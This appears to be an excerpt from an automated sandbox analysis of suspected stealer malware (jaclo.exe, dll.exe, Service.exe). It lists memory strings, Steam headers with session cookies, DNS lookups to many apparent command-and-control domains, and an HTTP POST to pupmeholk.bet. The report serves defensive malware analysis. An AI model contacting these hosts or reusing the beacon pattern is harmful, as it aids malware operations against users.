            Source: jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=2181ac080087ccbd00da0d7c; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=69bd117f5b804e6b996d6802; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=c6614cf12f3b266ca3cb6c03; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:35 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlRI equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=e88e16f0f92d4bea67712150; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:33 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR]]$SX equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www= equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-Ran equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: e-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-Ran$$P equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.0000000004015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.0000000004015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f825dcc90a93121322e63e41; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control.X equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: kbracketba.shop
            Source: global trafficDNS traffic detected: DNS query: featureccus.shop
            Source: global trafficDNS traffic detected: DNS query: mrodularmall.top
            Source: global trafficDNS traffic detected: DNS query: jowinjoinery.icu
            Source: global trafficDNS traffic detected: DNS query: legenassedk.top
            Source: global trafficDNS traffic detected: DNS query: htardwarehu.icu
            Source: global trafficDNS traffic detected: DNS query: cjlaspcorne.icu
            Source: global trafficDNS traffic detected: DNS query: bugildbett.top
            Source: global trafficDNS traffic detected: DNS query: latchclan.shop
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: weaponrywo.digital
            Source: global trafficDNS traffic detected: DNS query: crosshairc.life
            Source: global trafficDNS traffic detected: DNS query: pupmeholk.bet
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: unknownHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: pupmeholk.bet
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: Service.exe, Service.exe, 00000016.00000002.2513052311.00000261425C3000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EDE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmp, Service.exe.18.drString found in binary or memory: http://api.ipify.org
            Source: Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
            Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/5G
            Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/LH
            Source: Service.exe, 00000016.00000002.2513052311.00000261425CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/R
            Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/TH
            Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/UG
            Source: Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/er
            Source: Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/fons
            Source: Service.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/ngs
            Source: Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/s
            Source: Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org6
            Source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.drString found in binary or memory: http://api.ipify.orgInternetOpenUrl
            Source: Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgc
            Source: Service.exe, 00000016.00000002.2512379907.0000006EFF6F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2512372468.000000CD352F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512378824.000000B1744F9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://api.pifk
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered
            Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
